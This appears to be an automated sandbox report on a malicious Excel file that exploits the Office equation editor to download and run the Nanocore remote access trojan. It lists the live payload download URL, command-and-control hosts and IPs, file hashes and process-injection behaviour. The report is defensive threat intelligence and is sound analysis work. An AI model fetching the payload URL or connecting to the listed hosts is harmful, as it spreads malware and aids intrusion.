        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsnBAE9.tmp\lk95ejdjuy.dll
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsmCF90.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nshD819.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsh3B1F.tmp\lk95ejdjuy.dll
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsm1EE8.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsn937.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsxD645.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nss87C.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsn2761.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsn86CF.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsc6BC0.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsnEF9F.tmp\lk95ejdjuy.dll

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
        Source: Original title deed.xlsx Stream path 'EncryptedPackage' entropy: 7.99982473669 (max. 8.0)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2404 Thread sleep time: -360000s >= -30000s
        Source: C:\Users\Public\vbc.exe Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Users\Public\vbc.exe Code function: 4_2_0040659C FindFirstFileA,FindClose
        Source: C:\Users\Public\vbc.exe Code function: 4_2_004027A1 FindFirstFileA
        Source: vbc.exe, 00000006.00000003.2163349232.0000000000553000.00000004.00000001.sdmp Binary or memory string: Vmciwave.dll
        Source: vbc.exe, 0000000A.00000002.2201230427.00000000005D4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: C:\Users\Public\vbc.exe Code function: 4_2_10001000 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 4_2_003D18AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 4_2_003D1AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 6_2_02041AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 6_2_020418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 8_2_01E418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 8_2_01E41AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 10_2_00581AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 10_2_005818AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 12_2_00431AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 12_2_004318AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 14_2_027418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 14_2_02741AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 16_2_005D1AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 16_2_005D18AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 18_2_00531AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 18_2_005318AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 20_2_01F018AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 20_2_01F01AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 22_2_01F418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 22_2_01F41AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 24_2_00541AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 24_2_005418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 26_2_027418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 26_2_02741AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 28_2_00431AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 28_2_004318AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 30_2_027418AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 30_2_02741AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 32_2_003F18AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 32_2_003F1AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 34_2_10001000 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exe Code function: 34_2_01D61AC3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeCode function: 34_2_01D618AB mov eax, dword ptr fs:[00000030h]34_2_01D618AB
        Source: C:\Users\Public\vbc.exeCode function: 4_2_1000147A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_1000147A
        Source: C:\Users\Public\vbc.exeCode function: 34_2_1000147A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_1000147A

        HIPS / PFW / Operating System Protection Evasion:

        Maps a DLL or memory area into another process
        Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Process created: unknown unknown
        Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: vbc.exe, 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: vbc.exe, 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: vbc.exe, 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Exploitation for Client Execution 13 | Path Interception | Access Token Manipulation 1 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 111 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Remote Access Software 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation 1 | Security Account Manager | Remote System Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 111 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 4 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 122 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

        Behavior Graph

        Behavior Graph ID: 402852, Sample: Original title deed.xlsx, Startdate: 03/05/2021, Architecture: WINDOWS, Score: 100

        Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 10 other signatures
        Processes started from the sample: EQNEDT32.EXE, EXCEL.EXE
        EQNEDT32.EXE: DNS/IP: myhostisstillgood11.zapto.org, 172.245.45.28, 49165, 80, AS-COLOCROSSINGUS, United States
        EQNEDT32.EXE: dropped C:\Users\user\AppData\Local\...\nd[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32)
        EQNEDT32.EXE: signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        EQNEDT32.EXE: started vbc.exe
        vbc.exe: dropped C:\Users\user\AppData\...\lk95ejdjuy.dll (PE32)
        vbc.exe: signatures: Maps a DLL or memory area into another process; Writes many files with high entropy
        vbc.exe: started vbc.exe and MSBuild.exe
        Each later vbc.exe in the chain drops C:\Users\user\AppData\...\lk95ejdjuy.dll (PE32) and starts MSBuild.exe and, except for the last one, a further vbc.exe.

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe | 100% | Joe Sandbox ML |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        24.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        8.2.vbc.exe.2860000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        30.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        14.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        23.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        13.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        6.2.vbc.exe.2830000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        5.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        16.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        15.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        14.2.vbc.exe.2860000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        20.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        4.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        30.2.vbc.exe.2830000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        20.2.vbc.exe.27f0000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        28.2.vbc.exe.2940000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        14.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        24.2.vbc.exe.27f0000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        21.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        4.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        30.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        34.2.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1130366
        28.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        10.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        27.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        6.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        10.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        29.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        32.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        26.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        8.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        32.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        24.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        34.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        12.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        22.2.vbc.exe.2850000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        22.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        22.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        25.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        28.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        16.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        26.2.vbc.exe.27e0000.7.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        7.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        6.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        20.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        26.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        4.2.vbc.exe.30a0000.8.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        31.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        12.2.vbc.exe.1f10000.4.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        9.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        18.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        18.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
        8.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
        12.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        79.134.225.26 | 0% | Avira URL Cloud | safe
        nassiru1166main.ddns.net | 0% | Avira URL Cloud | safe
        http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
        http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe | 100% | Avira URL Cloud | phishing
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        myhostisstillgood11.zapto.org | 172.245.45.28 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          79.134.225.26 | true | Avira URL Cloud: safe | unknown
          nassiru1166main.ddns.net | true | Avira URL Cloud: safe | unknown
          http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe | true | Avira URL Cloud: phishing | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation

                            Contacted IPs

                            Public

                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            172.245.45.28 | myhostisstillgood11.zapto.org | United States | | 36352 | AS-COLOCROSSINGUS | true

                            General Information

                            Joe Sandbox Version:32.0.0 Black Diamond
                            Analysis ID:402852
                            Start date:03.05.2021
                            Start time:14:54:21
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Original title deed.xlsx
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:35
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.rans.troj.expl.evad.winXLSX@65/72@1/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 76.5% (good quality ratio 75.2%)
                            • Quality average: 86.4%
                            • Quality standard deviation: 22.4%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 78
                            • Number of non-executed functions: 35
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xlsx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            14:55:04 | API Interceptor | 79x Sleep call for process: EQNEDT32.EXE modified

                            Joe Sandbox View / Context

                            IPs

                            Match | Associated Sample Name / URL | Detection | Context
                            172.245.45.28 | 471e3984_by_Libranalysis.docx | malicious | nta.hopto.org/reg/vbc.exe
                            172.245.45.28 | Original title deed.xlsx | malicious | myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
                            172.245.45.28 | product specification.xlsx | malicious | myhostisstillgood11.zapto.org/dashboard/docs/images/kn.exe
                            172.245.45.28 | Original title deed.xlsx | malicious | 172.245.45.28/dashboard/docs/images/nd.exe
                            172.245.45.28 | INVOICE.xlsx | malicious | 172.245.45.28/img/america/white/nd.exe
                            172.245.45.28 | QUOTE4885 - NP200.xlsx | malicious | 172.245.45.28/img/america/white/nd.exe
                            172.245.45.28 | original title deed.xlsx | malicious | 172.245.45.28/img/america/white/nd.exe
                            172.245.45.28 | RFQ180584.xlsx | malicious | weloveplayinggames.servegame.com/img/covid19/covid.exe
                            172.245.45.28 | gOMIKZsuDd.docx | malicious | doctor.hopto.org/torotoro/nd.dot
                            172.245.45.28 | 4lcewJbARW.docx | malicious | doctor.hopto.org/dashboard/
                            172.245.45.28 | RFQ180584.xlsx | malicious | 172.245.45.28/img/covid19/drug.exe
                            172.245.45.28 | 6VjgC99atY.rtf | malicious | doctor.hopto.org/torotoro/kn.exe
                            172.245.45.28 | G9kQExKBp5.docx | malicious | 172.245.45.28/dashboard/
                            172.245.45.28 | SOA 83773.xlsx | malicious | 172.245.45.28/torotoro/nd.exe
                            172.245.45.28 | Swift Copy Ref.xlsx | malicious | 172.245.45.28/torotoro/kn.exe
                            172.245.45.28 | yOShx2XvCx.rtf | malicious | 172.245.45.28/torotoro/kn.exe
                            172.245.45.28 | GCvfEfu3QG.rtf | malicious | 172.245.45.28/torotoro/nd.exe
                            172.245.45.28 | transfer request Form.docx | malicious | 172.245.45.28/dashboard/

                            Domains

                            Match | Associated Sample Name / URL | Detection | Context
                            myhostisstillgood11.zapto.org | Original title deed.xlsx | malicious | 172.245.45.28
                            myhostisstillgood11.zapto.org | product specification.xlsx | malicious | 172.245.45.28

                            ASN

                            Match | Associated Sample Name / URL | Detection | Context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:downloaded
                            Size (bytes):599035
                            Entropy (8bit):7.977146744978909
                            Encrypted:false
                            SSDEEP:12288:aCkfYIfK//zHuSkSzInubnIs/m3LLaJ4FwYRevuKiDbyT7iC5:aJlK/rHuSzInubIs/ILaJwRUuKPF5
                            MD5:669DD51D521BE84D6F2C45012115FC5F
                            SHA1:DD4CBEE8A337E7E6BB7D5C570DB79D7C0F7A7EDE
                            SHA-256:5B6D4E4E80DD9A93F40ECFC45C2874D0C504ECF3680858BE3ED8E05381CF1188
                            SHA-512:77B918749FD865B999BB9A4956A7150882683C1CDB9AEF72883F72213E097C64BBD95E4FA2DE3B7814A22C392541EE304B0F276C66C775A464539F7900B58172
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            IE Cache URL:http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A1D09AB.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                            Category:dropped
                            Size (bytes):48770
                            Entropy (8bit):7.801842363879827
                            Encrypted:false
                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\846ADFD2.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                            Category:dropped
                            Size (bytes):48770
                            Entropy (8bit):7.801842363879827
                            Encrypted:false
                            SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                            MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                            SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                            SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                            SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B44CEF.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):653280
                            Entropy (8bit):2.8986555579375235
                            Encrypted:false
                            SSDEEP:3072:Q34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:q4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                            MD5:5A11FF2DF0D2565F8A20172B69F572FE
                            SHA1:57C22A19E352E559C34A1FC5E0313E84B6AAB2E0
                            SHA-256:C3676D9B2E837AA20E2E2C9675A64F727EDB7283977A548EB1B5B200DED8041E
                            SHA-512:375BE6EB1892BE0F9F679053BCDB98B21466C6192959C8EBF3323FA680BFFF196A191E6F143E1607F053CD3034A81F01D76D81B0947A4221E9420C7FB8D1347A
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB262224.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):5376
                            Entropy (8bit):5.026686871225034
                            Encrypted:false
                            SSDEEP:96:cxqkZ0LbLSNR8L5oCNYdWN8M6QNcvBvPy:caLPSQek4kBE6
                            MD5:C088309E58C4ACFF2F5185B95EAAAA58
                            SHA1:E720C19346D296573CD15C07E260FD6F9DEC6A75
                            SHA-256:F5308A8825176D8D2BA6A19F147D3DEFBF19B7EEA8C753D3C363DFEB2A6D7625
                            SHA-512:A5AD478F326EA5779AA64CE38F159CC6F74ABAABF1B59CA57CDDA1A53D1376A2F9115585153C9D014D3355290F7F25EF66E19A1908D81F83C860D0690F86735C
                            Malicious:false
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D80E13D5.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
